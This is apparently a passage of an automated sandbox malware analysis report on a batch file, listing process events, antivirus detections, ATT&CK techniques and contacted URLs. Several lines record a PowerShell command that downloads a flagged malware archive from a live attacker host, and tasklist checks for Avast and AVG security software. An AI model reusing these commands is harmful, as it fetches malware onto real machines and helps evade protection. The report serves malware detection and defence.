Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: txt2.batStatic file information: File size 15728640 > 1048576
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb-D source: powershell.exe, 00000007.00000002.1480562612.00000169F041B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbE}1` source: powershell.exe, 00000007.00000002.1480562612.00000169F03F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbgo source: powershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: y.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0633000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000007.00000002.1480562612.00000169F0373000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1480562612.00000169F03F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1478677710.00000169EE3CD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbk source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: powershell.exe, 00000007.00000002.1480562612.00000169F0373000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbl source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbJ source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbE source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9135
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 9135
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4199Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4682Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 4199 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 4682 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000007.00000002.1482022548.00000169F05E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:9135/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: find.exe, 00000006.00000002.1420129407.000001783E02B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000002.1420186228.000001783E334000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory2
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
txt2.bat8%ReversingLabs
txt2.bat11%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://kendychop.shop:9135/FTSP.zip100%Avira URL Cloudmalware
http://kendychop.shop:9135/FTSP.zipHOMEDRD100%Avira URL Cloudphishing
http://kendychop.shop:9135/FTSP.zip?100%Avira URL Cloudphishing
http://kendychop.shop:9135/bab.zip100%Avira URL Cloudmalware
http://kendychop.shop:9135/bab.zip(100%Avira URL Cloudphishing
http://kendychop.shop100%Avira URL Cloudphishing
http://kendychop.shop:9135/FTSP.zipyo100%Avira URL Cloudphishing
http://kendychop.shop:9135/bab.zipX100%Avira URL Cloudphishing
http://kendychop.shop:9135/bab.zipt9100%Avira URL Cloudphishing
http://kendychop.shop:9135/FTSP.zipHOMEDRIVE=C:HOMEPATH=100%Avira URL Cloudphishing
http://kendychop.shop:9135100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
kendychop.shop
154.216.17.175
truetrue
    unknown
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      time.windows.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://kendychop.shop:9135/bab.ziptrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1460447040.00000169818F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.00000169901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://kendychop.shop:9135/FTSP.zippowershell.exe, 00000007.00000002.1478677710.00000169EE347000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478677710.00000169EE3CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478677710.00000169EE360000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1479669330.00000169EE574000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000007.00000002.1460447040.000001698117D000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://kendychop.shoppowershell.exe, 00000007.00000002.1460447040.00000169815F6000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlppowershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://kendychop.shop:9135/FTSP.zipHOMEDRIVE=C:HOMEPATH=powershell.exe, 00000007.00000002.1479669330.00000169EE576000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480000178.00000169EFEE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1479669330.00000169EE574000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1480562612.00000169F0401000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1460447040.0000016981872000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://kendychop.shop:9135/FTSP.zipHOMEDRDpowershell.exe, 00000007.00000002.1482022548.00000169F0640000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://kendychop.shop:9135/FTSP.zip?powershell.exe, 00000007.00000002.1478677710.00000169EE347000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://kendychop.shop:9135/bab.zip(powershell.exe, 00000007.00000002.1480562612.00000169F0401000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://contoso.com/powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1460447040.00000169818F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.00000169901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1475774655.000001699007F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://kendychop.shop:9135/FTSP.zipyopowershell.exe, 00000007.00000002.1482022548.00000169F061A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://oneget.orgXpowershell.exe, 00000007.00000002.1460447040.0000016981636000.00000004.00000800.00020000.00000000.sdmpfalse
